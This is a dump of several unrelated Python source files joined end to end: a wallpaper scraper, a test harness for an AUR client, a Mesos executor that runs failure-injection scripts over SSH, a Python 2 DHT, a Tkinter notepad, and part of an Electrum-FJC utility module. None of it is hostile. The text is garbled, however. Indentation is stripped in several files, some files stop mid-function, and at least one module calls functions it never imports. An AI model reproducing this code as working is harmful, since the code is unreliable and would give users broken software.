import threading
import random
def get_requestHeaders():
headers = {
# 'accept': 'application/json, text/plain, */*',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'zh-CN,zh;q=0.9',
# 'content-length': '172',
# 'content-type': 'application/json;charset=UTF-8',
# 'dnt': '1',
# 'origin': 'https://wallpaper.zhhainiao.com',
# 'referer': 'https://wallpaper.zhhainiao.com/',
# 'sec-ch-ua': '"Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"',
# 'sec-ch-ua-mobile': '?0',
# 'sec-fetch-dest': 'empty',
# 'sec-fetch-mode': 'cors',
# 'sec-fetch-site': 'same-site',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36',
# 'x-cf-device-id': 'xxxx-xxx-xxx',
# 'x-cf-platform': 'webview'
}
return headers
def thd(dicts, page):
for i in dicts:
if i["Jpg4kUrl"] != "":
url = i["Jpg4kUrl"] # 存在4k就下载4k的
elif i["Jpg1920Url"] != "":
url = i["Jpg1920Url"]
name = i["wname"]
if name == '':
# 没有文件名就随便起一个
name = str(random.randint(1, 9)) + str(random.randint(1, 99)) + str(random.randint(1, 999999)) + ".jpg"
print(url, name, page)
pic = requests.get(url).content
        # Save path: a Z: RAM disk is used here, change it to suit your setup
with open("z:/spider/" + name + ".jpg", 'wb') as f:
f.write(pic)
def get_post_data(pageNumber=1, pageSize=24):
post_data = '{"login_info":{},"cate_id":2,"tag_id":null,"sort_type":2,"page":' + str(
pageNumber) + ',"page_size":' + str(
pageSize) + ',"common":{"open_id":null,"token":null,"device_id":null,"player_version":0,"platform":"pc"}}'
return post_data
if __name__ == '__main__':
post_data = get_post_data(1, 1)
response = requests.post("https://pcwallpaper.zhhainiao.com/wallpaper/static/list", headers=get_requestHeaders(),
data=post_data)
json_data = json.loads(response.text)["data"]
total = json_data["total"]
print(total)
'''
for page in range(1, 100):
r = requests.post("https://pcwallpaper.zhhainiao.com/wallpaper/static/list",
headers=get_requestHeaders(),
data='{"login_info":{},"cate_id":2,"tag_id":null,"sort_type":2,"page":' + str(page) +
',"page_size":24,'
'"common":{"open_id":null,"token":null,"device_id":null,"player_version":0,"platform":"pc"}}')
json_data = r.text
dumps = json.loads(json_data)
dicts = dumps["data"]["list"]
url = ""
name = ""
with open("json","w",encoding="utf-8") as f:
f.write(json_data)
threading.Thread(target=thd, args=(dicts,page,)).start()
'''
|
auracle_test.py | #!/usr/bin/env python
import fakeaur.server
import glob
import multiprocessing
import os.path
import subprocess
import tempfile
import time
import unittest
def FindMesonBuildDir():
# When run through meson or ninja, we're already in the build dir
if os.path.exists('.ninja_log'):
return os.path.curdir
# When run manually, we're probably in the repo root.
paths = glob.glob('*/.ninja_log')
if len(paths) > 1:
raise ValueError('Multiple build directories found. Unable to proceed.')
if len(paths) == 0:
raise ValueError(
'No build directory found. Have you run "meson build" yet?')
return os.path.dirname(paths[0])
class HTTPRequest(object):
def __init__(self, request):
self.requestline = request.pop(0)
self.command, self.path, self.request_version = self.requestline.split()
self.headers = {}
for line in request:
k, v = line.split(':', 1)
self.headers[k.lower()] = v.strip()
class TimeLoggingTestResult(unittest.runner.TextTestResult):
def startTest(self, test):
self._started_at = time.time()
super().startTest(test)
def addSuccess(self, test):
elapsed = time.time() - self._started_at
self.stream.write('\n{} ({:.03}s)'.format(
self.getDescription(test), elapsed))
class TestCase(unittest.TestCase):
def setUp(self):
self.build_dir = FindMesonBuildDir()
self._tempdir = tempfile.TemporaryDirectory()
self.tempdir = self._tempdir.name
self.requests_file = tempfile.NamedTemporaryFile(
dir=self.tempdir, prefix='requests-', delete=False).name
q = multiprocessing.Queue()
self.server = multiprocessing.Process(
target=fakeaur.server.Serve, args=(q,))
self.server.start()
self.baseurl = q.get()
self._WritePacmanConf()
def tearDown(self):
self.server.terminate()
def _ProcessDebugOutput(self):
self.requests_sent = []
with open(self.requests_file) as f:
header_text = []
for line in f.read().splitlines():
if line:
header_text.append(line)
else:
self.requests_sent.append(HTTPRequest(header_text))
header_text = []
self.request_uris = [r.path for r in self.requests_sent]
def _WritePacmanConf(self):
with open(os.path.join(self.tempdir, 'pacman.conf'), 'w') as f:
f.write('[options]\nDBPath = {}/fakepacman'.format(
os.path.dirname(os.path.realpath(__file__))))
def Auracle(self, args):
env = {
'PATH': '{}/fakeaur:{}'.format(
os.path.dirname(os.path.realpath(__file__)), os.getenv('PATH')),
'AURACLE_TEST_TMPDIR': self.tempdir,
'AURACLE_DEBUG': 'requests:{}'.format(self.requests_file),
'LC_TIME': 'C',
'TZ': 'UTC',
}
cmdline = [
os.path.join(self.build_dir, 'auracle'),
'--baseurl', self.baseurl,
'--color=never',
'--pacmanconfig={}/pacman.conf'.format(self.tempdir),
'--chdir', self.tempdir,
] + args
p = subprocess.run(cmdline, env=env, capture_output=True)
self._ProcessDebugOutput()
return p
def assertPkgbuildExists(self, pkgname, git=False):
self.assertTrue(
os.path.exists(os.path.join(self.tempdir, pkgname, 'PKGBUILD')))
if git:
self.assertTrue(
os.path.exists(os.path.join(self.tempdir, pkgname, '.git')))
def main():
test_runner = unittest.TextTestRunner(resultclass=TimeLoggingTestResult)
unittest.main(testRunner=test_runner)
|
executor.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import threading
from collections import namedtuple
import json
import logging
try:
from mesos.native import MesosExecutorDriver
from mesos.interface import Executor
from mesos.interface import mesos_pb2
except ImportError:
from mesos import Executor, MesosExecutorDriver
import mesos_pb2
from fabric.api import run, local, put, env, warn_only
from fabric.tasks import execute
logger = logging.getLogger("executor")
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
# failure steps
INIT, BEFORE_FAILURE, AFTER_FAILURE, AFTER_REVERT = range(4)
class FailureExecutor(Executor):
"""
Runs failure based on given from scheduler config.
For each failure in config do next steps:
- run healthcheck script, if failed stop failure running
- copy falure inducer script to the tested hosts
- run failure inducer script and store result
- run healthcheck and store result
- run failure reverter and store result
- run healthcheck and store result
If sys code of scripts runned on each step is succeeded failure running is succeeded,
otherwise is failed. If config key `failfast` is `true` and failure running is failed
execution of next failure will be stopped.
"""
def __init__(self):
self.logger = logger
def get_config(self, json_config):
def object_hook(d): return namedtuple('Config', d.keys())(*d.values())
return json.loads(
json_config,
object_hook=object_hook)
def run_failure(self, conn_config, failure_config, hostname):
statuses = []
def append_res(step, res):
statuses.append((step, res.succeeded, str(res)))
def healthcheck(step):
healthcheck_command = " ".join(
failure_config.healthcheck + ["--step=%s" % step])
with warn_only():
return local(healthcheck_command)
def task():
env.user = conn_config.username
if conn_config.password:
env.password = conn_config.password
if conn_config.key_filename:
env.key_filename = conn_config.key_filename
res = healthcheck(BEFORE_FAILURE)
self.logger.debug("Run healthcheck before failure, succeeded: %s", res.succeeded)
append_res('healthcheck before failure', res)
if res.failed:
return
self.logger.debug("Run inducer")
inducer_command = " ".join(failure_config.inducer)
inducer_file_name = failure_config.inducer[0].split("/")[-1]
            put(inducer_file_name, failure_config.inducer[0], mode=0o755)
res = run(inducer_command, quiet=True)
append_res('failure', res)
self.logger.debug("Run healthcheck after inducer, succeeded: %s", res.succeeded)
append_res('healthcheck after failure', healthcheck(AFTER_FAILURE))
self.logger.debug("Run reverter")
reverter_command = " ".join(failure_config.reverter)
reverter_file_name = failure_config.reverter[0].split("/")[-1]
            put(reverter_file_name, failure_config.reverter[0], mode=0o755)
res = run(reverter_command, quiet=True)
append_res('reverter', res)
self.logger.debug("Run healthcheck after reverter, succeeded: %s", res.succeeded)
append_res('healthcheck after reverter', healthcheck(AFTER_REVERT))
execute(task, host=hostname)
self.logger.debug("Statuses %s", statuses)
all_succeeded = all(i[1] for i in statuses) or False
return all_succeeded, statuses
def process_host(self, config, hostname):
self.logger.debug("Process host %s with failures %s", hostname, config.failures)
failures_statuses = {
failure_config.name: None
for failure_config in config.failures
}
for failure_config in config.failures:
succeeded, statuses = self.run_failure(config.ssh, failure_config, hostname)
failures_statuses[failure_config.name] = [succeeded, statuses]
if config.failfast and not succeeded:
self.logger.info("Failfast after scenario %s", failure_config.name)
break
return failures_statuses
def process_hosts(self, config):
self.logger.debug("Start hosts processing")
loglevel = getattr(logging, config.loglevel.upper())
self.logger.setLevel(loglevel)
return {
hostname: self.process_host(config, hostname)
for hostname in config.hosts
}
def launchTask(self, driver, task):
self.logger.debug("Launch task %s", task)
def run_task():
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_RUNNING
driver.sendStatusUpdate(update)
config = self.get_config(task.data)
self.logger.debug("Parsed config %s", config)
statuses = self.process_hosts(config)
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_FINISHED
# collect stdout/stderr
update.data = json.dumps(statuses)
self.logger.debug("Task finished")
driver.sendStatusUpdate(update)
return
thread = threading.Thread(target=run_task)
thread.start()
def main():
driver = MesosExecutorDriver(FailureExecutor())
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
if __name__ == "__main__":
main()
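# A sketch of the JSON config this executor consumes, reconstructed from the attributes the
# code above reads (loglevel, failfast, hosts, ssh.*, failures[*].name/healthcheck/inducer/
# reverter); the concrete values are illustrative assumptions, not part of the original file.
EXAMPLE_TASK_CONFIG = json.dumps({
    "loglevel": "debug",
    "failfast": True,
    "hosts": ["10.0.0.5"],
    "ssh": {
        "username": "root",
        "password": None,
        "key_filename": "/root/.ssh/id_rsa",
    },
    "failures": [
        {
            "name": "kill-service",
            "healthcheck": ["./healthcheck.sh"],
            "inducer": ["./induce_failure.sh", "--service=nginx"],
            "reverter": ["./revert_failure.sh", "--service=nginx"],
        },
    ],
})
# FailureExecutor().get_config(EXAMPLE_TASK_CONFIG) turns this JSON into the nested
# namedtuples that process_hosts() expects.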
|
pydht.py | import math
import json
import random
import uuid
import SocketServer
import threading
import time
import key_derivation
from .bucketset import BucketSet
from .hashing import hash_function, random_id
from .peer import Peer
from .shortlist import Shortlist
k = 20
alpha = 3
id_bits = 128
iteration_sleep = 1
keysize = 2048
DEFAULT_TTL = 604800 # = 7 days, in seconds.
class DHTRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
message = json.loads(self.request[0].strip())
message_type = message["message_type"]
print "Received message of type", message_type, "from", message["peer_id"]
if message_type == "ping":
self.handle_ping(message)
elif message_type == "pong":
self.handle_pong(message)
elif message_type == "find_node":
self.handle_find(message)
elif message_type == "find_value":
self.handle_find(message, find_value=True)
elif message_type == "found_nodes":
self.handle_found_nodes(message)
elif message_type == "found_value":
self.handle_found_value(message)
elif message_type == "store":
print "Request to store"
self.handle_store(message)
elif message_type == "downvote":
print "Asked to downvote an item"
self.handle_downvote(message)
        except (KeyError, ValueError):
            return
client_host, client_port = self.client_address
peer_id = message["peer_id"]
new_peer = Peer(client_host, client_port, peer_id)
self.server.dht.buckets.insert(new_peer)
def handle_ping(self, message):
client_host, client_port = self.client_address
id = message["peer_id"]
peer = Peer(client_host, client_port, id)
peer.pong(socket=self.server.socket, peer_id=self.server.dht.peer.id, lock=self.server.send_lock)
def handle_pong(self, message):
pass
def handle_find(self, message, find_value=False):
key = message["id"]
id = message["peer_id"]
client_host, client_port = self.client_address
peer = Peer(client_host, client_port, id)
response_socket = self.request[1]
if find_value and (key in self.server.dht.data):
value = self.server.dht.data[key]
peer.found_value(id, value, message["rpc_id"], socket=response_socket, peer_id=self.server.dht.peer.id, lock=self.server.send_lock)
else:
nearest_nodes = self.server.dht.buckets.nearest_nodes(id)
if not nearest_nodes:
nearest_nodes.append(self.server.dht.peer)
nearest_nodes = [nearest_peer.astriple() for nearest_peer in nearest_nodes]
peer.found_nodes(id, nearest_nodes, message["rpc_id"], socket=response_socket, peer_id=self.server.dht.peer.id, lock=self.server.send_lock)
def handle_found_nodes(self, message):
rpc_id = message["rpc_id"]
shortlist = self.server.dht.rpc_ids[rpc_id]
del self.server.dht.rpc_ids[rpc_id]
nearest_nodes = [Peer(*peer) for peer in message["nearest_nodes"]]
shortlist.update(nearest_nodes)
def handle_found_value(self, message):
rpc_id = message["rpc_id"]
shortlist = self.server.dht.rpc_ids[rpc_id]
del self.server.dht.rpc_ids[rpc_id]
shortlist.set_complete(message["value"])
def handle_store(self, message):
key = message["id"]
print "Asked to store data for id", key
print "Ciphertext is", message["value"]
self.server.dht.data[key] = message["value"]
self.server.dht.ttls[key] = DEFAULT_TTL
def handle_downvote(self, message):
key = message["id"]
print "Downvote for key", key, " -- uuid is ", message["uid"]
        self.server.dht.handle_downvote(key, message["uid"])
class DHTServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
def __init__(self, host_address, handler_cls):
SocketServer.UDPServer.__init__(self, host_address, handler_cls)
self.send_lock = threading.Lock()
class DHT(object):
def __init__(self, host, port, id=None, boot_host=None, boot_port=None):
if not id:
id = random_id()
self.id = id
self.peer = Peer(unicode(host), port, id)
# Data and data decay data structures
self.data = {}
self.recent_downvotes = []
self.downvotes = {}
self.ttls = {}
self.pending_replies = {}
self.buckets = BucketSet(k, id_bits, self.peer.id)
self.rpc_ids = {} # should probably have a lock for this
self.server = DHTServer(self.peer.address(), DHTRequestHandler)
self.server.dht = self
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
self.bootstrap(unicode(boot_host), boot_port)
def iterative_find_nodes(self, key, boot_peer=None):
shortlist = Shortlist(k, key)
shortlist.update(self.buckets.nearest_nodes(key, limit=alpha))
if boot_peer:
rpc_id = random.getrandbits(id_bits)
self.rpc_ids[rpc_id] = shortlist
boot_peer.find_node(key, rpc_id, socket=self.server.socket, peer_id=self.peer.id)
while (not shortlist.complete()) or boot_peer:
nearest_nodes = shortlist.get_next_iteration(alpha)
for peer in nearest_nodes:
shortlist.mark(peer)
rpc_id = random.getrandbits(id_bits)
self.rpc_ids[rpc_id] = shortlist
peer.find_node(key, rpc_id, socket=self.server.socket, peer_id=self.peer.id) ######
time.sleep(iteration_sleep)
boot_peer = None
return shortlist.results()
def iterative_find_value(self, key):
shortlist = Shortlist(k, key)
shortlist.update(self.buckets.nearest_nodes(key, limit=alpha))
while not shortlist.complete():
nearest_nodes = shortlist.get_next_iteration(alpha)
for peer in nearest_nodes:
shortlist.mark(peer)
rpc_id = random.getrandbits(id_bits)
self.rpc_ids[rpc_id] = shortlist
peer.find_value(key, rpc_id, socket=self.server.socket, peer_id=self.peer.id) #####
time.sleep(iteration_sleep)
return shortlist.completion_result()
def bootstrap(self, boot_host, boot_port):
if boot_host and boot_port:
boot_peer = Peer(boot_host, boot_port, 0)
self.iterative_find_nodes(self.peer.id, boot_peer=boot_peer)
def __getitem__(self, key):
hashed_key = hash_function(key)
if hashed_key in self.data:
return self.data[hashed_key]
result = self.iterative_find_value(hashed_key)
if result:
return result
raise KeyError
def __setitem__(self, key, value):
hashed_key = hash_function(key)
nearest_nodes = self.iterative_find_nodes(hashed_key)
if not nearest_nodes:
self.data[hashed_key] = value
for node in nearest_nodes:
node.store(hashed_key, value, socket=self.server.socket, peer_id=self.peer.id)
def publish(self, value):
key = str(uuid.uuid4())
print "Publishing content under new key:", key
hashed_key = hash_function(key)
print "Hashed key is:", hashed_key
# need to encrypt value
ciphertext = key_derivation.do_encrypt(key, value)
print "Cyphertext is:", ciphertext
nearest_nodes = self.iterative_find_nodes(hashed_key)
if not nearest_nodes:
print "Storing data for key {} locally".format(key)
self.data[hashed_key] = ciphertext
for node in nearest_nodes:
print "Sending data for key {} to closer nodes.".format(key)
node.store(hashed_key, ciphertext, socket=self.server.socket, peer_id=self.peer.id)
return key
def retrieve(self, key):
# Retrieve result
print "Looking up key:", key
hashed_key = hash_function(key)
print "Hashed key is", hashed_key
result = None
if hashed_key in self.data:
print "Data for key", "stored locally"
result = self.data[hashed_key]
else:
print "Data stored somewhere else: forwarding request"
result = self.iterative_find_value(hashed_key)
if not result:
print "Key", key, "not found"
raise KeyError
# result is encrypted + hmac'd
# Can throw ValueError if HMAC fails
print "Ciphertext is", result
plaintext = key_derivation.do_decrypt(key, result)
return plaintext
def downvote(self, key):
uid = str(uuid.uuid4())
hashed_key = hash_function(key)
nearest_nodes = self.iterative_find_nodes(hashed_key)
print "Downvoting", key
if not nearest_nodes:
print "Asked myself to downvote a key: {}".format(key)
for node in nearest_nodes:
print "Asking another node to downvote", key
node.downvote(hashed_key, uid, socket=self.server.socket, peer_id=self.peer.id)
def handle_downvote(self, key, uuid):
if uuid in self.recent_downvotes:
return
if key not in self.data:
return
        self.downvotes[key] = self.downvotes.get(key, 0) + 1
self.recent_downvotes.append(uuid)
def tick(self):
for (uuid, downvotes) in self.downvotes.items():
downvote_val = math.log(downvotes, 2)
self.ttls[uuid] -= downvote_val
for (uuid, ttl) in self.ttls.items():
if ttl <= 0:
print "UUID", uuid, " past TTL - deleting"
|
aplicativo.pyw | #! /usr/bin/python3.7
# -*- coding: utf-8 -*-
from tkinter import *
from tkinter import filedialog
import subprocess
import threading
import chardet
import sys
import os
from aspecto import Aspecto
from widgets.barrasuperior import BarraSuperior
from widgets.conteudo import Conteudo
from widgets.barrainferior import BarraInferior
from widgets.janelasalvar import JanelaSalvar
class Aplicativo(Tk):
def __init__(self):
super().__init__()
self.aspecto = Aspecto(self)
self.diretorio = ''
self.receberArquivo()
self.arquivoSalvo = False
self.chaveAtual = 'UTF-8'
self.janelaDeSalvar = None
self.barraSuperior = BarraSuperior(self)
self.conteudo = Conteudo(self)
self.barraInferior = BarraInferior(self)
self.mensagem = self.conteudo.conteudo.get(1.0, END)
self.bytes = bytes(self.mensagem, self.chaveAtual)
self.protocol('WM_DELETE_WINDOW', self.fecharJanela)
self.bind('<KeyPress>', self.verificarSalvamento)
self.verificarDiretorio()
self.verificarSalvamento()
    # Top bar (BarraSuperior) functions
def novo(self):
if self.janelaDeSalvar or self.arquivoSalvo:
self.diretorio = 'Arquivo novo'
self.conteudo.conteudo.delete(1.0, END)
self.mensagem = self.conteudo.conteudo.get(1.0, END)
else:
self.janelaDeSalvar = JanelaSalvar(self, 'novo')
self.verificarSalvamento()
def novaJanela(self):
aplicativo = threading.Thread(target=self.abrirApp)
aplicativo.start()
def carregar(self):
if self.janelaDeSalvar or self.arquivoSalvo:
copia = self.diretorio
self.diretorio = filedialog.askopenfilename(defaultextension='.txt',
filetypes=[('Arquivos de texto', '.txt'),
('Todos arquivos', '.*')])
if not self.diretorio:
self.diretorio = copia
else:
self.substituirConteudo()
else:
self.janelaDeSalvar = JanelaSalvar(self, 'carregar')
self.verificarSalvamento()
def salvar(self):
if self.diretorio == 'Arquivo novo':
self.salvarComo()
else:
self.salvarArquivo()
self.verificarSalvamento()
def salvarComo(self):
copia = self.diretorio
self.diretorio = filedialog.asksaveasfilename(defaultextension='.txt',
filetypes=[('Arquivos de texto', '.txt'),
('Todos arquivos', '.*')],
initialfile='*.txt')
if not self.diretorio:
self.diretorio = copia
else:
self.salvarArquivo()
self.verificarSalvamento()
def mudarCodificacao(self, norma):
self.chaveAtual = norma
self.barraInferior.status['text'] = self.chaveAtual
# File handling methods
def tentarAbrir(self):
with open(self.diretorio, 'rb') as arquivo:
self.bytes = arquivo.read()
try:
self.mensagem = self.bytes.decode(self.chaveAtual)
except UnicodeDecodeError:
chute = chardet.detect(self.bytes)
self.mensagem = self.bytes.decode(chute['encoding'])
self.chaveAtual = chute['encoding']
finally:
self.barraInferior.status['text'] = self.chaveAtual
def salvarArquivo(self):
with open(self.diretorio, 'wb') as arquivo:
texto = self.conteudo.conteudo.get(1.0, END)
self.bytes = texto.encode(self.chaveAtual)
arquivo.write(self.bytes)
self.mensagem = self.bytes.decode(self.chaveAtual)
# Functions that check the state of the content text
def verificarSalvamento(self, evento=None):
if self.mensagem == self.conteudo.conteudo.get(1.0, END):
self.title(f'{self.diretorio} - Bloco de Notas')
self.arquivoSalvo = True
else:
self.title(f'{self.diretorio} * - Bloco de Notas')
self.arquivoSalvo = False
self.bytes = bytes(self.mensagem, self.chaveAtual)
self.verBytes()
def fecharJanela(self):
self.verificarSalvamento()
if self.janelaDeSalvar:
self.janelaDeSalvar.lift()
elif not self.arquivoSalvo:
self.janelaDeSalvar = JanelaSalvar(self, 'fechar')
else:
self.destroy()
# Other functions
def abrirApp(self):
if os.name == 'nt':
subprocess.call(['pythonw', 'aplicativo.pyw'])
else:
os.system('./aplicativo.pyw')
def receberArquivo(self):
if len(sys.argv) < 2:
self.diretorio = 'Arquivo novo'
else:
self.diretorio = sys.argv[1]
try:
arquivo = open(self.diretorio)
arquivo.close()
except FileNotFoundError:
self.diretorio = 'Arquivo novo'
def verificarDiretorio(self):
if self.diretorio != 'Arquivo novo':
self.substituirConteudo()
def substituirConteudo(self):
self.tentarAbrir()
self.conteudo.conteudo.delete(1.0, END)
self.conteudo.conteudo.insert(END, self.mensagem)
self.conteudo.conteudo.delete(float(self.conteudo.conteudo.index(END)) - 1.0)
def verBytes(self):
print(self.bytes)
if __name__ == '__main__':
Aplicativo().mainloop()
|
util.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'FJC':8, 'mFJC':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['FJC', 'mFJC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " FJC"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
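# Illustrative use (the class and method below are made up): decorating a function
# or method logs its wall-clock execution time through print_error on every call,
# so output only appears while verbosity is enabled.
#
#   class Synchronizer:
#       @profiler
#       def run(self):
#           ...   # logs e.g. "[profiler] Synchronizer.run 0.1234"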
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum-fjc.electrum-fjc'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-fjc'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
